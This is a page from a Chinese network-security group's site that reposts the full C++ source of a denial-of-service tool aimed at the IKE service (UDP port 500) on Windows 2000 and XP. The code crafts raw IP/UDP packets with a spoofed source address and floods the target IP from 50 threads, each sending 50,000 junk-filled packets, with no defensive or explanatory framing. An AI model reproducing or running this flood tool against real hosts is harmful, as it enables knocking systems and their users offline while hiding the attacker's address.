您当前的位置 >> 首页     

WIN2K中的 IKE(UDP 500)DOS代码

/ns/wz/comp/data/20020819052518.htm

////////////////////////////////////////////////////////////////////////////////
//
// Win2K IKE UDP DOS (PORT 500)
//
// File : IKEDOS.cpp
// Comment : only for win2k and XP(pro\server\adv)
//
// // Create by : refdom
// Email : refdom@263.net
// Home Page : www.opengram.com
////////////////////////////////////////////////////////////////////////////////

#include <process.h>
#include <winsock2.h>
#include <ws2tcpip.h>

#pragma comment (lib, "ws2_32.lib")

#define SOURCE_PORT 7900
#define IKE_UDPPORT 500
#define FAKE_SOURCE_IP "192.168.1.1"

typedef struct ip_hdr //定义IP首部
{
unsigned char h_verlen; //4位首部长度,4位IP版本号
unsigned char tos; //8位服务类型TOS
unsigned short total_len; //16位总长度(字节)
unsigned short ident; //16位标识
unsigned short frag_and_flags; //3位标志位
unsigned char ttl; //8位生存时间 TTL
unsigned char proto; //8位协议 (TCP, UDP 或其他)
unsigned short checksum; //16位IP首部校验和
unsigned int sourceIP; //32位源IP地址
unsigned int destIP; //32位目的IP地址
}IP_HEADER;

typedef struct udp_hdr //UDP首部
{
unsigned short sourceport;
unsigned short destport;
unsigned short udp_length;
unsigned short udp_checksum;
} UDP_HEADER;


void IKEDOSThread(void* Target);

//CheckSum:计算校验和的子函数
USHORT checksum(USHORT *buffer, int size)
{
unsigned long cksum=0;
while(size >1)
{
cksum+=*buffer++;
size -=sizeof(USHORT);
}
if(size )
{
cksum += *(UCHAR*)buffer;
}
cksum = (cksum >> 16) + (cksum & 0xffff);
cksum += (cksum >>16);
return (USHORT)(~cksum);
}

int main(int argc, char* argv[])
{
WSADATA WSAData;

if (argc < 2 )
{
printf ("input targetip!\n");
return 0;
}

if (WSAStartup(MAKEWORD(2,2), &WSAData) != 0 )
{
printf("WSA Error!\n");
return 0;
}

Sleep(500);
printf ("DOS Starting......\n");
for (int i =0 ; i < 50; i++)
{
_beginthread(IKEDOSThread, 0, (void*) argv[1]);
}

Sleep(100000);

WSACleanup();
return 0;
}

void IKEDOSThread(void* Target)
{
SOCKET sock;
SOCKADDR_IN addr_in;
IP_HEADER ipHeader;
UDP_HEADER udpHeader;
int nRetCode;
char* pBuffer;
char* pSendBuffer;
int nBufferSize = 1024;

BOOL flag;
int iTotalSize,iUdpCheckSumSize,i,j;
char *ptr=NULL;

pBuffer = (char*) malloc(nBufferSize);
FillMemory(pBuffer, nBufferSize, 'A');
pSendBuffer = (char*) malloc(nBufferSize + 60);

sock = WSASocket(AF_INET,SOCK_RAW,IPPROTO_UDP,NULL,0,0);
if (sock==INVALID_SOCKET)
{
printf("socket Error!\n");
return;
}

flag=true;
if (setsockopt(sock,IPPROTO_IP,IP_HDRINCL,(char*)&flag,sizeof(flag))==SOCKET_ERROR)
{
printf("setsockopt Error!\n");
return;
}

iTotalSize=sizeof(ipHeader) + sizeof(udpHeader)+ nBufferSize;

ipHeader.h_verlen = (4 << 4) | (sizeof(ipHeader) / sizeof(unsigned long));
ipHeader.tos=0;
ipHeader.total_len=htons(iTotalSize);
ipHeader.ident=0;
ipHeader.frag_and_flags=0;
ipHeader.ttl=128;
ipHeader.proto=IPPROTO_UDP;
ipHeader.checksum=0;
//ipHeader.sourceIP=inet_addr(argv[1]);
ipHeader.destIP=inet_addr((char*)Target);

udpHeader.sourceport = htons(SOURCE_PORT);
udpHeader.destport = htons(IKE_UDPPORT);
udpHeader.udp_length = htons(sizeof(udpHeader) + nBufferSize);
udpHeader.udp_checksum = 0;

ptr = NULL;
ipHeader.sourceIP = htonl(ntohl(inet_addr(FAKE_SOURCE_IP)));

ZeroMemory(pSendBuffer, nBufferSize + 60);
ptr = pSendBuffer;
iUdpCheckSumSize=0;
udpHeader.udp_checksum = 0;

memcpy(ptr, &ipHeader.sourceIP, sizeof(ipHeader.sourceIP));
ptr += sizeof(ipHeader.sourceIP);
iUdpCheckSumSize += sizeof(ipHeader.sourceIP);

memcpy(ptr, &ipHeader.destIP, sizeof(ipHeader.destIP));
ptr += sizeof(ipHeader.destIP);
iUdpCheckSumSize += sizeof(ipHeader.destIP);

ptr++;
iUdpCheckSumSize++;

memcpy(ptr, &ipHeader.proto, sizeof(ipHeader.proto));
ptr += sizeof(ipHeader.proto);
iUdpCheckSumSize += sizeof(ipHeader.proto);

memcpy(ptr, &udpHeader.udp_length, sizeof(udpHeader.udp_length));
ptr += sizeof(udpHeader.udp_length);
iUdpCheckSumSize += sizeof(udpHeader.udp_length);

memcpy(ptr, &udpHeader, sizeof(udpHeader));
ptr += sizeof(udpHeader);
iUdpCheckSumSize += sizeof(udpHeader);

memcpy(ptr, pBuffer, nBufferSize);
iUdpCheckSumSize += nBufferSize;

udpHeader.udp_checksum=checksum((USHORT*)pSendBuffer,iUdpCheckSumSize);

addr_in.sin_family=AF_INET;
addr_in.sin_port=htons(IKE_UDPPORT);
addr_in.sin_addr.S_un.S_addr=inet_addr((char*) Target);

// for (j=0; j<=253; j++)
// {
// udpHeader.udp_checksum -= j;
// ipHeader.sourceIP = htonl(ntohl(inet_addr(FAKE_SOURCE_IP)) + j);
//ZeroMemory(sendbuf,sizeof(sendbuf));
memcpy(pSendBuffer, &ipHeader, sizeof(ipHeader));
memcpy(pSendBuffer + sizeof(ipHeader), &udpHeader, sizeof(udpHeader));
memcpy(pSendBuffer + sizeof(ipHeader) + sizeof(udpHeader), pBuffer, nBufferSize);

for ( i = 0 ; i <= 50000; i++)
{

if (sendto(sock, pSendBuffer, iTotalSize, 0, (SOCKADDR *)&addr_in, sizeof(addr_in))==SOCKET_ERROR)
{
printf("Send Error!\n");
return;
}
else
{
// printf("Send OK!\n");
}
}
// }//end for

closesocket(sock);
free(pBuffer);
free(pSendBuffer);
}

关于我们 | 加入我们 | 网站结构 | 交换连接 | 联系我们

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Network Security Group.
All Rights Reserved.
W3C XHTML 1.0 Strict & CSS 1.2 Valid.